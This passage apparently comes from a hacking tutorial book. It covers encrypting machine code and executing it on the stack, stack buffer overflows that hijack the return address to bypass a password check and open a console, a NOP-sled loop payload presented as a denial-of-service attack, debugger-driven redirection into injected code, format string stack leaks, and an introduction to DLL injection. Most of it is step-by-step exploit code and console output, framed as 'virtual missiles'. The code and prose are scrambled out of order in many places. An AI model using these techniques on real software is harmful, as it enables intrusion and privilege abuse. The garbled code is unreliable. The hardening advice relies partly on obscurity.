where x can be a register.exe is shown below 112 . Now consider the following instructions.cpp program.The lea x. The output of assemstack. Here the number 34 is by adding the 4 bytes of address pointer to printf and remaining 0x30 (48 in decimal) bytes of string. the stack clearing call is done. Finally. 34h The push eax instruction pushes the address contained in eax register as an argument for function at [ebp+08h]. Well eax contains the pointer to string. The eax pointer was created by lea instruction. The add esp. x instruction removes the x number (x is in hex) of allocated bytes from the stack of the previously called function. y instruction is used to create the pointer of y in x. it is the pointer to printf function. the next code looks familiar push eax call [ebp+08h] add esp. Rest of the code has the same explanation as that of previous onstack. Then a call for function whose address is contained at position [ebp+08].
113 .
First. Then. The process will be completed in few steps. it may increase the time taken by them to crack the software and can cause them some desperation. We need the address of the beginning of the function’s machine code in the text section for this purpose. In the next example. In next step. it will place the machine code in stack memory. Then the XOR operation is done on the machine code placed in the stack. In this technique the encrypted machine code is copied to the stack memory and then decrypted back to the original form and executed. But a dedicated hacker can identify such cipher blocks in the code and cannot be stopped but. we would subtract it from the address of the very next address. At last the scrambled machine code will be written into a disk file so that it can be transplanted in the program where it is needed.Encrypting & Decrypting Code on Stack The code encryption is an important security feature employed by the software developers to strengthen the immune system of the software itself. we are going to encrypt the machine code of the core function. we’ll copy the function’s machine code into an array. Actually they just do not rely on the disassembly of the code. It accelerates the process of scrutiny of software code. we need to calculate the length of the function’s machine code. These steps will be carried out with the help of pointers to the functions. but also follow the actual execution path of the software. in high-level code. leading the hackers to the wrong path. Let us study the example code for encrypting a functions machine code and then writing it into a text file. 114 . This will encrypt the code and will deface the original machine code. This process forces the dissemblers to produce the wrong disassembly of the code thus. Note: Hackers utilize the Fusion technique for cracking the software.
44h mov byte ptr[ebp-2Bh]. 30h mov byte ptr[ebp-2Fh].72h mov byte ptr[ebp-17h].20h mov byte ptr[ebp-15h].cpp */ #include <iostream> using namespace std.68h mov byte ptr[ebp-1Eh].68h mov byte ptr[ebp-14h].72h mov byte ptr[ebp-22h].6Eh mov byte ptr[ebp-12h].20h mov byte ptr[ebp-26h].65h mov byte ptr[ebp-1Dh].4Ah mov byte ptr[ebp-2Eh].61h mov byte ptr[ebp-2Dh].79h mov byte ptr[ebp-16h]. void printString(int (*print) (const char *..)) __asm { sub esp.6Eh mov byte ptr[ebp-21h]./*crypta.20h mov byte ptr[ebp-1Ch].20h mov byte ptr[ebp-20h].65h mov byte ptr[ebp-1Ah].6Dh mov byte ptr[ebp-1Bh].65h mov byte ptr[ebp-2Ah]..69h mov byte ptr[ebp-2Ch].6Dh mov byte ptr[ebp-19h].76h mov byte ptr[ebp-29h].61h mov byte ptr[ebp-28h].74h mov byte ptr[ebp-1Fh].21h mov byte ptr[ebp-27h]..65h mov byte ptr[ebp-24h].6Fh mov byte ptr[ebp-18h].61h mov byte ptr[ebp-13h].61h mov byte ptr[ebp-23h].64h { 115 .4Ch mov byte ptr[ebp-25h].
char codeBuff[1000].65h mov byte ptr[ebp-3].2Eh mov byte ptr[ebp-1]...75h mov byte ptr[ebp-4]. i++) codeBuff[i] = ((char *)stackMover)[i]. for(int i = 0. 34h } } void cryptIT() FILE *fp.69h mov byte ptr[ebp-0Fh].6Eh mov byte ptr[ebp-7]. void (*stackMover) (int (*) (const char *.(unsigned int)stackMover.65h mov byte ptr[ebp-0Ah]. crypt = cryptIT.69h mov byte ptr[ebp-6].67h mov byte ptr[ebp-0Dh]..)).. int (*print) (const char *.63h mov byte ptr[ebp-9].. [ebp-2Fh] push eax call [ebp+08h] add esp.6Eh mov byte ptr[ebp-0Eh]. i < codeLen.00h lea eax. { 116 . unsigned int codeLen = (unsigned int)crypt . print = printf..68h mov byte ptr[ebp-8].20h mov byte ptr[ebp-0Ch].74h mov byte ptr[ebp-0Bh].). stackMover = printString.6Ch mov byte ptr[ebp-10h].mov byte ptr[ebp-11h].73h mov byte ptr[ebp-2].71h mov byte ptr[ebp-5]. void (*crypt) ().
(unsigned int)stackMover.cpp is similar to assemstack.cpp. fclose(fp).txt is opened in a hex editor it looks like: The most part of code of crypta. } { The above program can be compiled using following command: CL /Gs crypta. unsigned int codeLen = (unsigned int)crypt .cpp. fp).. When crypta. i < codeLen. stackMover = (void (*) (int (*) (const char *.fp = fopen("crypta.cpp. Let us discus the code snippets of crypta. stackMover(print). The cryptIT function contains most of the code which was placed inside main function in assemstack.txt". 117 .)))&codeBuff[0]. i++) fputc(((char *)codeBuff)[i] ^ 0x7A. for(i=0.cpp which are not present in assemstack. } int main (int argc.txt and inserts the machine code of the printString function. "a").cpp The above program creates a file named crypta.. char* argv[]) cryptIT().. return EXIT_SUCCESS.
nor it will produce null bytes by XORing with itself). The pointer to printString (stackMover) is redefined to the address of first byte of the machine code of printString on the stack memory by inserting the address of first element of array codeBuff.txt. The above code snippet is the objective of the crypta. i++) fputc(((char *)codeBuff)[i] ^ 0x7A. stackMover(print). i < codeLen. fp = fopen("crypta.txt. fp contains the handler to the text file crypta.. element of codeBuff is XORed with 0x7A (that number is chosen. The FOR loop iterates until counter equals length of machine code. Then in each iteration. This cal can be omitted.cpp program. for(i=0.txt is created in append mode for inserting the encrypted machine code of the printString function. stackMover = (void (*) (int (*) (const char *. In above line. 118 .. fp). Finally.)))&codeBuff[0]. we call the function printString from the stack using its pointer. Finally. a text file crypta.In this code the length of printString function is calculated by subtracting the pointer of printString from the pointer of cryptIT. we do this for debugging purpose only. fclose(fp).txt".. "a"). The above code snippet closes the text file crypta. which should not be present in the code. after XORing the number is written in a text file.
char code[]="\x2f\xf1\x96\x29\x2c\x2d\xf9\x96 \x4a\xbc\x3f\xab\x30\xbc\x3f\xa8\x1b\xbc\x3f\xa9\x13\xbc\x3f\xae\x3e\xb c\x3f\xaf\x1f\xbc\x3f\xac\x0c\xbc\x3f\xad\x1b\xbc\x3f\xa2\x5b\xbc\x3f\x a17\xbc\x3f\x9f\x1f\xbc\x3f\x9c\x1 7\xbc\x3f\x9d\x15\xbc\x3f\x92\x08\xbc\x3f\x93\x03\xbc\x3f\x90\x5a\xbc\x 3c\x19\xbc\x3f\x8d\x12\xbc\x3f\x8 2\x14\xbc\x3f\x83\x13\xbc\x3f\x80\x0b\xbc\x3f\x81\x0f\xbc\x3f\x86\x1f\x bc\x00". The code is as shown in next block: \x2f\xf1\x96\x29\x2c\x2d\xf9\x96\x4a\xbc\x3f\xab\x30\xbc\x3f\xa8\x1b\xb c\x3f\xa9\x13\xbc\x3f\xae\x3e\xbc\x3f\xaf\x1f\xbc\x3f\xac\x0c\xbc\x3f\x ad\x1b\xbc\x3f\xa2\x5b\xbc\x3f\xa1 7\xbc\x3f\x9f\x1f\xbc\x3f\x9c\x17\xbc\x3f\x9d\x15\xbc\x3f\x92\x08\xbc\x 3f\x93\x03\xbc\x3f\x90\x5a\xbc\x3 c\x19\xbc\x3f\x8d\x12\xbc\x3f\x82\x14\xbc\x3f\x83\x13\xbc\x3f\x80\x0b\x bc\x3f\x81\x0f\xbc\x3f\x86\x1f\xbc Let us use this code into another program.)).txt into a hex editor and copy the hex dump into WordPad and replace all the blank spaces with “\x” this is the encrypted machine code of the function printString. only then the decrypted code will execute.. /* decrypta. { 119 . char* argv[]) char codeBuffer[1000]. int (*print) (const char *. int main (int argc. print = printf. But we need to decrypt the machine code first. which can be used in any program..)...Open the crypta... void (*printString) (int (*) (const char *.cpp */ #include <iostream> using namespace std.
. Then a function pointer is created by inserting the address of first byte of codeBuffer into the function pointer.))) &codeBuffer[0].. printString(print). printString = (void (*) (int (*) (const char *. for (int i = 0. i < codeLen. // Instead of next very FOR loop srtcpy function can also be used here. } When XOR operation is carried out on the encrypted buffer again using the same XOR key (in this case the key is 0x7A).. i++) codeBuffer[i] = code[i]. return EXIT_SUCCESS. for (i = 0. And the address of printf function is provided to this retrieved machine code as function argument and then the code is executed by calling its pointer.int codeLen=strlen(&code[0]). the original machine code of printString function is retrieved. i++) codeBuffer[i] = codeBuffer[i] ^ 0x7A. The result is shown below 120 . i < codeLen.
This can be achieved by using the assembly inserts or by inserting the NOP sled of same size as that of encrypted code into the program and then by using the hex editor changing this NOP sled into the encrypted code. 121 ." << endl.text section (code section) instead of the data section. The degree of strength can be increased by inserting the NOP sled inside a naked function. thus hard to identify at first site in the disassembled code. The technique works better if the encrypted machine code is kept in the . The naked function does not have any prologue or epilogue. It will force the dissembler to produce the false assembly.This is the technique mostly used by protection developers. A typical naked function definition is shown below: void __declspec (naked) nakFunct() } { cout << "This is the naked function example.
122 . the overflow in assigned memory is termed as buffer overflow. The buffer overflow bugs are the resultant of developers’ underestimation of required amount of memory buffers for input. These bugs can be exploited and the attacker can get administrative or root privileges locally or remotely.Buffer Overflow Attack As name defines itself.
Every time a function call occurs. so just like stealth missiles and RADAR defeating technologies there are the techniques to bypass firewalls & IDS and to land in victim systems and do the job in stealth mode undetected. which can be more destructive than real bombs and missiles. before jumping into the function code. Thus.Rocket & Missile Theories & Manufacturing In this section we are going to deal with the rockets. missiles. We cannot write the EIP directly but an indirect approach is used. Isn’t it interesting? Friends! In next sections we will be discussing the techniques to develop such virtual missiles and target scanning bombs in hacking society called as Injection vector and payloads. the address of one next to calling instruction is saved on the stack as return address. it will return to that address by placing that saved return address in EIP register. satellites & highly sophisticated virtual code bombs. We also need to be strong in this field. 123 . To effectively understand and exploit this bug a deep understanding of memory allocation mechanism is required. Just keep on reading… Buffer overflow bugs are architectural and platform independent. So that when the function will finish its job (ret instruction). Basically a buffer overflow occurs by overwriting the EIP (Enhanced Instruction Pointer) register. A major portion of vulnerabilities is constituted by buffer overrun vulnerabilities. Well friends army and defense services use this technology to break-in the enemy warhead computer systems or to hack down the enemy defense service systems and collect secret information or to de-arm the enemy. if we’ll overwrite this saved copy of return address. This part of hacking science is specially expertise by US army and other western defense & intelligence research & design services & agencies. But remember alike the enemy RADAR systems there are firewalls & IDS in victim systems. Yes! It is possible to neutralize or control the system controlling the missiles or other security equipments with our virtual missiles & payload.
we must have to overwrite the return address with the one lying in the section bearing the execute attribute. The BSS section holds the execute attribute by default. if any one accidentally or intentionally inserts more than 20 characters to this array will exceed its boundary limit of 20 characters (19 username characters + 1 null termination) and will cause a buffer overrun and the input buffer will be spawn over the important structures & code of the software and thus damage the structure of software and crashing the program. Now." << endl.cpp */ #include <iostream> using namespace std. "Usage:\n%s <string>". char* argv[]) char name[15]. cout << "If string buffer will exceed 15 bytes. The . { 124 .text section is always executable. int main (int argc. We’ll slowly move with examples from lower potential to high potential risk for security using shellcode. It can be achieved by overflowing the buffer. So if we are placing the shellcode (attacker supplied machine code) it must be placed in a section having write and execute attributes. But. } cout << "This is a buffer overflow example. Consider the following program: /* overflow. Consider an array buffer of 20 bytes named userName[20]. { fprintf (stderr.we‘ll be controlling the processor as we wish. if a carefully crafted buffer is supplied to the userName[20] then the executional flow of software can be controlled by the attacker leading to execute attacker’s supplied arbitrary code. Shellcode is the opcode (operational code) that provides shell or a command console of the victim system that is actually not permitted to the attacker. argv[0]). if ( argc < 2) exit(-1). But remember that the different memory sections have attributes assigned to them." << endl. it will cause an overflow.
as shown in figure below. Just check out the EIP and EBP registers values. C:\access denied\code\Debug>overflow Usage: overflow <string> C:\access denied\code\Debug>overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA This is a buffer overflow example. which are marked in a circle. //-----------------buffer overflow section end------------system("PAUSE").//----------------buffer overflows section code------------strcpy (name. We executed it check it out: Microsoft Windows XP [Version 5. the string size increases than the buffer limit then the string bytes will start overwriting the important structures in stack memory and cause buffer overflow. If string buffer will exceed 15 bytes. . argv[1]). This program runs normal with no side effects. As in above example. when we run the program normally it runs normally but when the string exceeds the buffer limit an overflow occurs and when we pressed enter it popped out the well known “Send error report” dialogue showing that some error has occurred.2600] (C) Copyright 1985-2001 Microsoft Corp. it will cause an overflow. It is OK until the user-supplied string is lower than 15 bytes in size. When we pressed “Debug” and then “OK” then the dump of registers was clearly presented to us. } Compile this program and run it. But when.1. . 125 . return EXIT_SUCCESS. Press any key to continue .
Well 0x41 is the hex equivalent of 65 which is decimal equivalent of “A”. Remember from the registers discussion that EIP register contains the address of executing instruction code. the processor must execute them. But. we filled the EIP with 0x41414141 and when processor executes the ret instruction before exit. Thus. In above example. how to exploit this situation? The answer is EIP!!! Yes the EIP register. therefore. But. But. if we change the EIP value to an address where we have put executable instructions in hex format then.The EIP and EBP both have got 0x41414141. it has to return to the address which is contained in EIP. it found nothing there. the buffer string “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA” is clearly unfit for a 15 bytes buffer and spawned over the structure of program code and overwrites the values to be loaded in EIP and EBP registers. Thus. 126 . But. it jumped to execute instruction at 0x41414141. during copying process it was changed by us intentionally. an exception is raised.
If string buffer will exceed 15 bytes. The second part is actually the address of main function i.cpp exists. “40107E” in reverse order 7E1040.exe. it will cause an overflow. If string buffer will exceed 15 bytes. This is a buffer overflow example.exe to another directory and then analyze this newly copied file to avoid the debugger to find for source code default automatically. if we can redirect the execution of ‘main’ back to ‘main’ function. let’s study some of the simple ways to trick the program execution.For sake of simplicity. Thus. The output we got is as shown below. .exe. It is advised to copy the newly created overflow. We executed it twice wow!!! The string “AAAAAAAAAAAAAAAAAAAA~^P@“has two parts. We found the address of main is 0x0040107E. otherwise alter the settings of debugger. it will cause an overflow.cpp This will simplify the learning process by avoiding the stack protection calls when accessing the stack. In same way “^P” is equivalent to 0x10 in hex which is 16 in decimal and the last 0x40 is the hex of 64 in decimal and which in turn is “@”. We will also learn the ways to thwart stack protection mechanism in next discussions. Think. compile the program by avoiding the stack checking calls by using /Gs with CL as: C:\Access denied\code>Cl /Gs overflow. First of all. . Press any key to continue . . C:\access denied\code\Debug\dump>overflow AAAAAAAAAAAAAAAAAAAA~^P@ This is a buffer overflow example. Note: Use the ALT + Numeric Keypad to frame the above example address 127 . As 0x7E is hex equivalent of 126 in decimal (check with calculator) and 126 is the ASCII code for “~”.e. We checked the disassembly of overflow. Therefore we crafted the string as “AAAAAAAAAAAAAAAAAAAA~^P@” and injected it into the overflow. Also CL will compile and create exe file in same directory in which overflow. we got the address “40107E” equal to “~^P@” (don’t include inverted commas). . the first part is “AAAAAAAAAAAAAAAAAAAA“and second part is “~^P@“. Press any key to continue .
This is just an introduction to the way by which the buffer overflow bugs are exploited. In the next software. The Stack Base Pointer contains an address of the base of the stack frame for this very function. will show a login failed message and will terminates. heap dereferencing and stack overflow. E.in the string. its allotment and management. Before indulging deeply into this discussion.g. Now let’s proceed with another example. Firstly. Alt + 16 will print ^P and Alt + 64 will print @. otherwise. The buffer overflows are of two types. we will study the stack based buffer overflows. The other variable will be saved in space above NULL termination. Remember after the completion of function depending upon the calling conventions. we must learn some basics of structure of memory. 128 . Alt + 126 will print ~. The following figure will clear some basics about the stack memory structure. this stack frame will get cleared out. This address is the top of the stack of calling routine. we will be authenticating the password and if it matched it will start a command console.
"Usage:\n%s <password21>". error). // argv[] is a pointer array and // argv[0] represents the program name. } strcpy(passBuffer. char password[] = "iAMsatisfied"./* seconsol." << endl. if (strcmp (password. argv[0]). { // remember 20 bytes for string & 21st if ( argc < 2) { // this section will get control if command-line argument will be missing. goto EXIT. argv[1]). // exit with error ( non-zero integer means 129 . passBuffer) == 0) consolFunc(). char passBuffer[21]. void consolFunc (void) system("START"). // argv[1] represents the first command-line argument // argv[2] represents the second command-line argument and so on. } else } EXIT: return EXIT_SUCCESS. } int main (int argc. fprintf (stderr.cpp */ #include <iostream> #include <process. // the registered password.h> using namespace std. byte for NULL termination. char* argv[]) { // argc represents the number of command-line arguments including // program name. { exit (-1). } { cout << "Login failed.
OK friends now check out the disassembled text file and check out for the address of string “START”. It comes out to be 0x00401081 but we can also start from starting of function at 0x0040107E as you wish. Well. Yes! The overflow occurs and the EIP can be overwritten. alt + 16.exe and check it for proper security. or directly from keypad [remember that ^P is not “shift + 6 and then P” but “ctrl + P”]). As shown below Microsoft Windows XP [Version 5. Well everything is working properly. Now check out the number of bytes it takes to overwrite the saved return address to be loaded in EIP register and after that number of bytes place the ~^P@ (0x0040107E but in reverse order as 7E 10 40 in decimal it is equal to 126 16 64[now press all numbers in numeric key pad along with ‘Alt’ key] alt + 126. therefore. Now pass it a much bigger string than its buffer limit. C:\access denied\code>seconsol Usage: seconsol <password21> 130 . Let’s see what happens. By using password ‘iAMsatisfied’ it opens a command console but shows ‘Login failed’ message if wrong user is supplied.data /rawdata:bytes seconsol.txt Let’s execute the seconsol.data section using Dumpbin /section:.1.cpp And disassemble it using dumpbin /disasm and redirect its output to a text file in dump directory as shown below C:\code>dumpbin /disasm seconsol. the address of “START” can be known from . search for 40E0A0 in disassembly code file.exe And we found it is 0x0040E0A0.exe >dump\seconsolx.Compile the above program as: CL /Gs seconsol. alt + 64.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\access denied\code>seconsol AAAAAAAAAAAAAAAAAAAAAAAAAAAA~^P@ Login failed. 131 . but as we overflow the saved return address so we are able to bypass the password check (even if the check is done properly) and when main function executes the ret instruction of its own epilogue. Note: The “Login failed” is shown because the strcmp() function works properly and returns an error. the changed saved return address gets loaded into the EIP & execution is transferred to this address location. but it opens the command console. C:\access denied\code> In last attempt the message shown is “Login failed.C:\access denied\code>seconsol iAMsatisfied C:\access denied\code>seconsol vinnu Login failed.”.
But. selfsufficient program snippets in c++. Its hex 0x90 (144 in decimal). This technique is very easy and don’t need to learn whole structure of assembly programming. we were only redirecting the process within itself. we will be writing the small self contained. NOP Sled: Nop nothing. we mean to trespass the EIP so that the processor will run the code supplied by us into a buffer. now its time to do something different. But processors do not understand the higher-level code. Well. this technique will be quite helpful in writing fullfledged shellcode. Then with the help of disassembler we will identify the code in whole program and then copy the hex equivalents of assembly instructions from Hex editor. we do not need an assembler but we will write the assembly instructions within __asm { assembly code } in any c++ program and will compile the code. All in all it’s a code returning a shell. Some important technical terms: Fusion Technique: In this technique.Overflow with Custom Machine Code Well. friends until this point. The method we are going to follow is called Fusion Technique. And NOP Sled is the instructions used to fill the buffers where 132 . We’ll discus different techniques to develop shellcode for windows as well as for Linux systems in forthcoming discussions. It does not mean that we need to write full-fledged assembly programs and need an assembler. Instead. just equivalent is block of 0x90 instruction is used to direct processor to do jump on to next instruction. Shellcode: The block of opcode designed especially to provide a command shell or desired results by injecting this code into a vulnerable application. So we have to supply the buffer with machine instructions directly.
foiling the attack plan. The op code is 0x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\xEB\xF8 The NOP Sled is according to the size of buffer (20 bytes in this case) end of the NOP Sled is appended with a jump instruction i. In printable format we will supply this code in this form as ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ° Note: Security systems like firewalls or intrusion detection systems detect the unprintable bytes in the data packets and if found then. filters them out therefore. void consfunc(void) system("PAUSE"). Now its time to frame an ideal example /* newflow. but no other side effect or infection. where we are not certain about the exact address of beginning of the buffer containing the shellcode. we got it by transforming the hex format into decimal and then writing the decimal from numeric keypad with ALT key. Well.cpp */ #include <iostream> using namespace std. to thwart such filtration of shellcode. { { 133 .no useful processing is needed. Therefore. It is helpful in buffer overflow exploits. } int main (int argc. in such a situation the NOP Sled is filled in the beginning of shellcode containing buffer.e. we have to transform the shellcode into printable character format. We shall discus this later in shellcode section. The code is actually a NOP Sled with an appended jump again within the NOP Sled and thus the code will trap the processor in an endless loop. This code is very easy and can be used to perform DOS attack (Denial Of Service Attack) or partially make the system to crawl by consuming the CPU usage to 100%. EB F8. char* argv[]) char stringBuffer[20]. initially we will try to inject a code that does not need to be compiled. So that the saved return address may intersect any of the address inside the NOP Sled and thus the execution will be bridged to the shellcode. Friends.
.cout << "Enter the string: ". using this hack. 134 . It will contain “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”. “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA” and press enter.getline(stringBuffer. The same address will be contained by ESP register. we’ll try to break the boundary of array index limited functions like getline in Modifying the Process Memory section). Compile this as C:\>CL /Gs newflow.0 and open the executable file for debugging. In our case we found it to be 0x0012FF6C. It is created for fun only and roughly (in order to show you that even the secure functions like getline can also be vulnerable if implemented carelessly. Now from Build menu click on Start Debug and then click GO. Check in the Task Manager window.getline(stringBuffer. 30). cin. Now set the breakpoint at line cin. 30). Check the memory window. Therefore. } Don’t confuse with the code. return EXIT_SUCCESS. Just check out the address of the beginning of the above string. the program fells in an infinite loop. C:\code>newflow Enter the string: ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ°l ^R Press any key to continue . by right clicking on the line or from edit menu. This very address will be the address that we need to fill the saved return address or EIP. the ASCII form of opcode with return address appended to it (12FF6C in reverse order is l ^R or in decimal 6CFF12 == 108 255 18) in reverse order becomes ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ°l ^R And this is the required injection vector and when we insert it when we are prompted. If needed press F10 and at console type the string when ready. . the CPU performance will be 100% and in processes tab the process named “newflow.exe” will be using CPU consumption will be 98 to 99. consfunc().cpp Now open the Visual C++ 6.
135 .
136 . Friends try to do lots of practice as much as you can.With this example. every time with a different program code. we are now able to control the CPU and can run any custom code designed for special purpose or shellcode.
char* argv[]) char userName[21]. Let’s do it practically. /* arbcode.cpp */ #include <iostream> using namespace std. cout << "Enter the userid: ". userId = "vinnu". int main (int argc. 21). But a problem is there. The next program just takes input from the user and shows it on the screen. we need sufficient rights to debug the applications. The charm of this technique is that it does not need the software to have any memory leakage or overflow problems.getline (userName. char *pass = new char. userId) == 0) { { { if (strcmp (passwd. pass = "iAMsatisfied". the memory block containing the shellcode is searched and then the execution pointer is set on the first line of shellcode and the execution is again continued. cin. The administrators have full privileges to debug the applications effectively in NT environment. cout << "Enter the password: ". Even the neatly written software pieces can also be attacked by this technique. pass) == 0) 137 .getline (passwd. if (strcmp(userName. 21). Then. actually the attacker shifts the execution on to the arbitrary machine code supplied by the attacker in a controlled buffer. cin.Executing the Arbitrary Code In this discussion we are going to learn some of the tricks to execute the arbitrary code provided by us. The attacker initiates the software and puts his shellcode in the buffer provided for legitimate input from him. char *userId = new char. char passwd[21].
138 ." << endl. Compile the code and execute it as C:\access denied\code>arbcode Enter the userid: vinnu Enter the password: iAMsatisfied Login Successful.cout << "Login Successful." << endl. return EXIT_SUCCESS. } { cout << "Login Failed. C:\access denied\code>arbcode Enter the userid: iAMsatisfied Enter the password: vinnu Login Failed." << endl. C:\access denied\code>arbcode Enter the userid: as123æ Enter the password: coinƒ Login Failed. { cout << "Login Failed. } else } } else } delete userId. delete pass. C:\access denied\code>arbcode Enter the userid: vinnu Enter the password: iAMsatisfiedA Login Failed.
open the debugger and attach to the running process arbcode using BUILD menu and Start Debug and then Attach to process. these are 004010B8 68 C8 30 41 00 push 4130C8h This instruction pushes the address of the string “Enter the userid:” But this code has already executed so go on scrolling down. Now we want this program to execute whatever we will provide it in userId or password buffers. To do this. Note: É is 0x90 in hex and to supply it in buffer. C:\access denied\code>arbcode Enter the userid: ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ° Do not press Enter yet. Now. We found another & it is 004010DA 68 DC 30 41 00 push 4130DCh 139 . execute the program and when asked to enter the userId pass it the string ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ°. Yes. switch on Numlock & press Alt+144. we got few. 0xEB is Alt+235 and 0xF8 by pressing Alt+248) in numeric keypad. Now in Edit menu select Goto in text box specify the address 0x0040107E now scroll down the disassembled code in debugger and look for the code pushing the addresses lying inside the .data section.C:\access denied\code> The program works as desired. This string is actuallyxF8.
Right click on any of the NOP instruction and select the 140 . There is another effective method to find out the stack addresses. And press enter in the process arbcode. In Edit menu select Goto and insert this address as we did (Remember to select the disassembly section in debugger. we got our injected buffer values 90 90 90 90 … etc. so any of the NOP instruction can get the execution control first). Now check the value of ESP and put it in address area of memory box. In our case. the registers were holding the following values EAX = 00414D20 EBX = 7FFDE000 ECX = 0012FFB0 EDX = 00414D20 ESI = 00000000 EDI = 00000016 EIP = 004010DA ESP = 0012FF38 EBP = 0012FF80 EFL = 00000246 Just a little below the ESP address. Note the address of any of these values (our injected code is independent of first instruction execution bound. The debugger will get highlighted. We selected 0x0012FF71. Open the Call Stack window from ‘view->debug window’ & check out the addresses given in this window.This instruction pushes the address of the string “Enter the password:” Insert a breakpoint on this instruction as this instruction is yet to be executed (actually execution will be broken automatically after password prompting). nor the Goto will operate in memory box). Now we have the address of controlled buffer.
“Set Next Statement” and then press “Go” or F5 key. Check it out with task manager’s performance tab with 100% performance or in processes tab check for CPU column of arbcode. In this way we can do whatever we want to do. Summary: In this attack.text section in the code just after the code handling the string buffer and when the debugger is popped out. when the process itself runs on higher privileges and the user can trick it to do anything using the shellcode. the memory address of the string buffer is searched. the breakpoint is set on the memory location somewhere in the . And the arbitrary code will get the executional control. 141 . Once we got the location of the string buffer. Even the programs which are neat & clean from memory overflows or off by one can also be tricked to execute the desired code. we can transfer the execution on the code contained in the string buffer. The situation becomes bad from security point of view.
It will make the attacker to land directly into the string handling code in executable file using the error or message tracing methods. 2) While taking the input from a user-controlled buffer. we must take care of few things such as: 1) Delete the buffer strings from memory as soon as possible. etc. Remember. 5) Do not use the well-known methods to get the user input in the code. snprintf. we must add junk bytes after each character of the string. 142 . Also remember that not all the bugs are exploitable. Be creative and try to employ new techniques in different programs. All these techniques are not enough to secure the software against such attacks. it will make the life somewhat harder for an attacker. 6) Always use the limit bounding string-handling functions like getline.Hardening the Buffer Security The arbitrary code execution attack makes most of the software vulnerable. at some places in certain circumstances we may have to compromise and need to use some insecure techniques. This leads to the undesired result if the string will be executed or will fail the execution and will foil the attack. 4) Do not define the error messages or other screen messages related to the user input in program closely with string handling code. To make the software to sustain such an attack. Even if the software will be developed using all secure techniques. 3) Transform the string into something else as soon as possible so as to make it harder to find the string into the memory and foil the attempt to directly execute it even if it is found.
In above example we have just removed the variable c from the arguments list for printf function. c = %x\n”. a. printf () is such a function who’s arguments shows a large variety in their type. The format string character follows the ‘%’ sign. b. c = 3 Bur suppose. which are used to format the variables as required. b. b = 2. The issue is related to a well-known formatting function “printf” in c & c++. will print like it a = 1. b = 2.Format String Attack This attack is a result of the lack of understanding the security issues. int main (int argc.e. c = %x\n”. c = 3. return EXIT_SUCCESS. a = 1. Well friends. its number of arguments are not fixed. b = %08x. b = %x. a. A simple usage of printf looks like this: Suppose a = 1. c. Let’s use the above crafted function in an example as: /* formt.cpp */ #include <iostream> using namespace std. printf("a = %08x. c = %08x". c = 3 then printf (“a = %x. if we remove the third variable from the printf format string arguments i. b = %x. char* argv[]) int a. But at this time we are going to discus some of its extraordinary aspects. but we haven’t intentionally removed the format string for c/c++ from the printf body. b). c). The printf is normally used to format the output and to display the results on the screen. printf () is a very interesting function. b = 2. a. } { 143 . which arise due to bad programming habits or laziness of developers. We have used this function many times in our preceding programs. b). printf (“a = %x.
if (argc < 2){ cout << "usage: fmats <string10>" << endl. b = 00000002. where from it arrived here? Well the printf is so foolish to check out that we haven’t provided it any variable for c format string. char* argv[]) char *array. void main(int argc. The printf can also directly take the variable name for printing without any format string i. exit(1). c = 00000014 Hey! Look at the value c = 00000014. It printed a memory location from the stack where all its arguments are pushed before call. printf(array). } array = argv[1]. printf (variable). Let’s program it also #include <iostream> using namespace std.e.The execution of above program gives us: a = 00000001. } { Let’s execute it: C:\Documents and Settings\vinnu\Develop>fmats usage: fmats <string10> C:\Documents and Settings\vinnu\Develop>fmats AAAAAAAA AAAAAAAA C:\Documents and Settings\vinnu\Develop>fmats AAAAAAAA%d AAAAAAAA4263634 C:\Documents and Settings\vinnu\Develop>fmats AAAAAAAA%d%d AAAAAAAA42636341245120 C:\Documents and Settings\vinnu\Develop> 144 .
00404a1f.0012ffc0.00000006 The above output shows us the stack memory for printf function.0012ffc0.7ffdf000 . Yes it is if you are just a programmer.00410e00. Well friends as a programmer you may have learned that it is a garbage value.00404a1f C:\Documents and Settings\vinnu\Develop>fmats %08x.%08x. the output was AAAAAAAA4263634.%08x.%08x.%08x.00000002.%08x. When we introduced a format string explicitly to the input string the printf function responded to it and provided in its place a number. Let’s check all other format strings also C:\Documents and Settings\vinnu\Develop>fmats %08x.00000001.%08x. The output is strange.Observe the output when the string was AAAAAAAA%d.00000000.%08x.%08x 00410ed2.00000012.00410e90.%08x.%08x 00410ea2.%08x . But is something called stack transparency if you are a hacker.%08x. Now compile the same program in Linux system as: 145 .
The API functions are the way the application software talk to the operating system or request the appropriate services. let’s come back to our attack plan. We mean the first argument at rightmost place then second argument towards left side and last argument at leftmost corner for clearance check out the figure. As in windows vista the DLLs are always loaded at a random base address.DLL Injection Attack This attack plan solves the problem of non-executable stack. The DLLs can be linked with any process space dynamically. Before a function call. Actually windows kernel consists of two major layers 1) DLL layer 2) VXD layer The VXD layer is the virtual device driver layer and DLL layer contains the dynamically loaded libraries. Enough on DLLs. the privileges equal to the system or the kernel itself. Well friends this attack plan is a modified version of ‘Return to libc’ attack in Linux systems. We will discus the vxd layer and the methods to raise the privileges in next few topics.e.dll is always loaded in every process at 0x7c800000 and ntdll. The vxd layer is used by hackers. viruses & worms to raise the low privilege mode of any program from ring3 to ring0 in NT environment i. The system’s most DLLs are always loaded at a fixed address.dll at 0x7c900000 in our case in windows XP. The attack needs the understanding of addressing and argument placing system in stack memory of a process. 146 .exe. Like kernel32. This attack needs a little deeper understanding of things. the function arguments are placed in stack memory from right to left (for cdecl otherwise depends upon the declaring conventions). But these base addresses can be changed using rebase. which provide the precious API functions.
